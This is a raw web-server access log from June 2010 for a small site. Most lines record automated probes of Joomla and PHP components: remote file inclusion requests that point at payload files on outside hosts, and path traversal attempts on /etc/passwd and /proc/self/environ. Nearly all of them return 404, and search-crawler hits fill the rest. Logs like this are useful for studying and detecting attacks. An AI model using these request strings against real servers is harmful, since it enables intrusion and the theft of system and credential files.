70.38.52.2 - - [27/Jun/2010:10:52:38 -0500] "GET /logs/index.php?option=com_hsconfig&controller=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt??????? HTTP/1.1" 404 298 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
70.38.52.2 - - [27/Jun/2010:10:52:39 -0500] "GET /logs/access_log.1274572800/index.php?option=com_hsconfig&controller=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt??????? HTTP/1.1" 404 320 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
70.38.52.2 - - [27/Jun/2010:10:52:39 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
70.38.52.2 - - [27/Jun/2010:10:52:39 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 298 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
70.38.52.2 - - [27/Jun/2010:10:52:39 -0500] "GET /logs/access_log.1274572800/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
70.38.52.2 - - [27/Jun/2010:10:52:39 -0500] "GET /logs/errors.php?error=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt??????? HTTP/1.1" 404 299 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
70.38.52.2 - - [27/Jun/2010:10:52:39 -0500] "GET /logs/access_log.1274572800/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 320 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
70.38.52.2 - - [27/Jun/2010:10:52:39 -0500] "GET /logs/access_log.1274572800/errors.php?error=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt??????? HTTP/1.1" 404 321 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
70.38.52.2 - - [27/Jun/2010:10:52:40 -0500] "GET /index.php?option=com_hsconfig&controller=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt??????? HTTP/1.1" 404 293 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
70.38.52.2 - - [27/Jun/2010:10:52:40 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
70.38.52.2 - - [27/Jun/2010:10:52:40 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 293 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
70.38.52.2 - - [27/Jun/2010:10:52:40 -0500] "GET /errors.php?error=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt??????? HTTP/1.1" 404 294 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
70.38.52.2 - - [27/Jun/2010:10:53:27 -0500] "GET /logs/access_log.1275782400/index.php?option=com_hsconfig&controller=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt??????? HTTP/1.1" 404 320 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
70.38.52.2 - - [27/Jun/2010:10:53:28 -0500] "GET /logs/access_log.1275782400/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
70.38.52.2 - - [27/Jun/2010:10:53:28 -0500] "GET /logs/access_log.1275782400/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 320 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
70.38.52.2 - - [27/Jun/2010:10:53:28 -0500] "GET /logs/access_log.1275782400/errors.php?error=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt??????? HTTP/1.1" 404 321 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
174.121.176.46 - - [27/Jun/2010:10:53:44 -0500] "GET /logs/access_log.1274054400//index.php?option=com_sectionex&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
174.121.176.46 - - [27/Jun/2010:10:53:45 -0500] "GET //index.php?option=com_sectionex&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.176.46 - - [27/Jun/2010:10:53:45 -0500] "GET /logs//index.php?option=com_sectionex&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
77.221.130.28 - - [27/Jun/2010:10:54:30 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
188.40.106.183 - - [27/Jun/2010:10:56:44 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.833"
67.195.112.180 - - [27/Jun/2010:10:58:16 -0500] "GET /logs/access_log.1236643200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
110.11.20.41 - - [27/Jun/2010:10:58:22 -0500] "GET /logs/access_log.1274572800///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 363 "-""libwww-perl/5.79"
110.11.20.41 - - [27/Jun/2010:10:58:22 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
110.11.20.41 - - [27/Jun/2010:10:58:23 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 341 "-""libwww-perl/5.79"
87.250.252.241 - - [27/Jun/2010:10:58:43 -0500] "GET /logs/access_log.1235347200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
193.254.241.12 - - [27/Jun/2010:11:02:43 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
92.243.84.187 - - [27/Jun/2010:11:02:50 -0500] "GET /plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=file&folder= HTTP/1.0" 404 349 "tomdolan.pconline.com/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=file&folder=""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
193.254.241.12 - - [27/Jun/2010:11:13:08 -0500] "GET /logs/access_log.1274572800///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 363 "-""libwww-perl/5.79"
193.254.241.12 - - [27/Jun/2010:11:13:08 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
193.254.241.12 - - [27/Jun/2010:11:13:08 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 341 "-""libwww-perl/5.79"
188.40.106.183 - - [27/Jun/2010:11:16:49 -0500] "GET /logs/access_log.1274832000///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 363 "-""libwww-perl/5.833"
188.40.106.183 - - [27/Jun/2010:11:16:49 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.833"
188.40.106.183 - - [27/Jun/2010:11:16:50 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 341 "-""libwww-perl/5.833"
193.254.241.12 - - [27/Jun/2010:11:31:07 -0500] "GET /logs/access_log.1276646400///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 363 "-""libwww-perl/5.79"
67.195.112.180 - - [27/Jun/2010:11:31:40 -0500] "GET /logs/access_log.1275004800 HTTP/1.0" 200 862165 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.218.116.165 - - [27/Jun/2010:11:37:00 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
67.195.112.180 - - [27/Jun/2010:11:42:06 -0500] "GET /logs/access_log.1154649600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.13.132 - - [27/Jun/2010:11:43:11 -0500] "GET /logs/access_log.1240444800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.162.98.101 - - [27/Jun/2010:11:54:48 -0500] "GET / HTTP/1.1" 200 1003 "-""Java/1.6.0"
207.191.228.114 - - [27/Jun/2010:11:55:32 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
207.191.228.114 - - [27/Jun/2010:11:55:32 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
207.191.228.114 - - [27/Jun/2010:11:55:32 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
207.191.228.114 - - [27/Jun/2010:11:55:32 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
207.191.228.114 - - [27/Jun/2010:11:55:32 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
207.191.228.114 - - [27/Jun/2010:11:55:32 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
207.191.228.114 - - [27/Jun/2010:11:55:32 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
207.191.228.114 - - [27/Jun/2010:11:55:32 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
207.191.228.114 - - [27/Jun/2010:11:55:32 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
216.129.119.43 - - [27/Jun/2010:11:57:49 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
207.46.199.201 - - [27/Jun/2010:12:01:36 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.30.129.57 - - [27/Jun/2010:12:06:22 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
67.30.129.57 - - [27/Jun/2010:12:06:23 -0500] "GET /logs/access_log.1266710400%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
67.30.129.57 - - [27/Jun/2010:12:06:23 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
67.195.112.180 - - [27/Jun/2010:12:07:21 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.30.129.57 - - [27/Jun/2010:12:08:13 -0500] "GET /logs/access_log.1276646400%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
89.108.117.87 - - [27/Jun/2010:12:10:08 -0500] "GET /index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 294 "-""Casper Bot Search"
89.108.117.87 - - [27/Jun/2010:12:10:08 -0500] "GET /logs/access_log.1276819200%20%20/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 323 "-""Casper Bot Search"
89.108.117.87 - - [27/Jun/2010:12:10:18 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 299 "-""Casper Bot Search"
89.108.117.87 - - [27/Jun/2010:12:10:46 -0500] "GET /logs/access_log.1276732800%20%20/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 323 "-""Casper Bot Search"
67.195.112.180 - - [27/Jun/2010:12:18:02 -0500] "GET /logs/access_log.1185840000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
208.115.111.248 - - [27/Jun/2010:12:19:39 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
188.127.249.197 - - [27/Jun/2010:12:29:30 -0500] "GET /logs/access_log.1276819200%20%20/bad_link.php?theme_path=http://www.shop-astro.fr/id.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
188.127.249.197 - - [27/Jun/2010:12:29:30 -0500] "GET /logs/bad_link.php?theme_path=http://www.shop-astro.fr/id.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
188.127.249.197 - - [27/Jun/2010:12:29:30 -0500] "GET /bad_link.php?theme_path=http://www.shop-astro.fr/id.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
87.249.98.22 - - [27/Jun/2010:12:35:18 -0500] "GET /logs/bad_link.php?theme_path=http://www.shop-astro.fr/id.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
87.249.98.22 - - [27/Jun/2010:12:35:18 -0500] "GET /bad_link.php?theme_path=http://www.shop-astro.fr/id.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
87.249.98.22 - - [27/Jun/2010:12:35:18 -0500] "GET /logs/access_log.1276819200%20%20/bad_link.php?theme_path=http://www.shop-astro.fr/id.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
85.17.213.148 - - [27/Jun/2010:12:38:12 -0500] "GET /logs/access_log.1274832000//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.833"
85.17.213.148 - - [27/Jun/2010:12:38:12 -0500] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.833"
85.17.213.148 - - [27/Jun/2010:12:38:12 -0500] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.833"
207.46.204.177 - - [27/Jun/2010:12:38:41 -0500] "GET /logs/access_log.1173571200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.249.98.22 - - [27/Jun/2010:12:43:02 -0500] "GET /logs/access_log.1276819200%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.shop-astro.fr/id.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
87.249.98.22 - - [27/Jun/2010:12:43:02 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.shop-astro.fr/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
87.249.98.22 - - [27/Jun/2010:12:43:02 -0500] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.shop-astro.fr/id.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
87.249.98.22 - - [27/Jun/2010:12:43:02 -0500] "GET /logs/access_log.1275868800%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.shop-astro.fr/id.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
188.127.249.197 - - [27/Jun/2010:12:43:40 -0500] "GET /logs/access_log.1275868800%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.shop-astro.fr/id.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
188.127.249.197 - - [27/Jun/2010:12:43:40 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.shop-astro.fr/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
188.127.249.197 - - [27/Jun/2010:12:43:40 -0500] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.shop-astro.fr/id.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
188.127.249.197 - - [27/Jun/2010:12:43:54 -0500] "GET /logs/access_log.1276819200%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.shop-astro.fr/id.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
89.108.117.87 - - [27/Jun/2010:12:44:09 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 299 "-""Casper Bot Search"
89.108.117.87 - - [27/Jun/2010:12:44:09 -0500] "GET /logs/access_log.1274054400/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 321 "-""Casper Bot Search"
89.108.117.87 - - [27/Jun/2010:12:44:09 -0500] "GET /index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 294 "-""Casper Bot Search"
67.195.112.180 - - [27/Jun/2010:12:46:27 -0500] "GET /?D=A HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
208.115.111.248 - - [27/Jun/2010:12:53:23 -0500] "GET /artwork/furniture-motto-line.htm HTTP/1.1" 200 2441 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [27/Jun/2010:12:53:26 -0500] "GET /logs/access_log.1210291200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [27/Jun/2010:12:53:30 -0500] "GET /logs/access_log.1210377600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [27/Jun/2010:12:53:35 -0500] "GET /logs/access_log.1210723200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [27/Jun/2010:12:53:39 -0500] "GET /logs/access_log.1210896000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [27/Jun/2010:12:53:44 -0500] "GET /logs/access_log.1210982400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [27/Jun/2010:12:53:49 -0500] "GET /logs/access_log.1211068800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [27/Jun/2010:12:53:54 -0500] "GET /logs/access_log.1211155200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [27/Jun/2010:12:53:59 -0500] "GET /logs/access_log.1211241600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [27/Jun/2010:12:54:04 -0500] "GET /logs/access_log.1211414400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [27/Jun/2010:12:54:09 -0500] "GET /logs/access_log.1211500800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
94.208.87.223 - - [27/Jun/2010:12:57:12 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 32768 "http://perez.livehomelucky.eu/100505/p2/""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
94.208.87.223 - - [27/Jun/2010:12:57:17 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 32768 "http://perez.livehomelucky.eu/100505/p2/""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
67.15.152.183 - - [27/Jun/2010:13:05:14 -0500] "GET /index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
83.103.72.131 - - [27/Jun/2010:13:05:47 -0500] "GET /index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
87.249.98.22 - - [27/Jun/2010:13:11:58 -0500] "GET /logs//linkadmin.php?page=http://www.shop-astro.fr/id.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
87.249.98.22 - - [27/Jun/2010:13:11:58 -0500] "GET /logs/access_log.1276128000%20%20//linkadmin.php?page=http://www.shop-astro.fr/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
87.249.98.22 - - [27/Jun/2010:13:11:58 -0500] "GET //linkadmin.php?page=http://www.shop-astro.fr/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
87.249.98.22 - - [27/Jun/2010:13:12:37 -0500] "GET /logs/access_log.1276819200%20%20//linkadmin.php?page=http://www.shop-astro.fr/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
188.127.249.197 - - [27/Jun/2010:13:13:48 -0500] "GET //linkadmin.php?page=http://www.shop-astro.fr/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
188.127.249.197 - - [27/Jun/2010:13:13:48 -0500] "GET /logs/access_log.1276128000%20%20//linkadmin.php?page=http://www.shop-astro.fr/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
188.127.249.197 - - [27/Jun/2010:13:13:48 -0500] "GET /logs//linkadmin.php?page=http://www.shop-astro.fr/id.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
188.127.249.197 - - [27/Jun/2010:13:13:50 -0500] "GET /logs/access_log.1276819200%20%20//linkadmin.php?page=http://www.shop-astro.fr/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
65.66.35.1 - - [27/Jun/2010:13:14:11 -0500] "GET /logs/access_log.1276128000%20%20//linkadmin.php?page=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
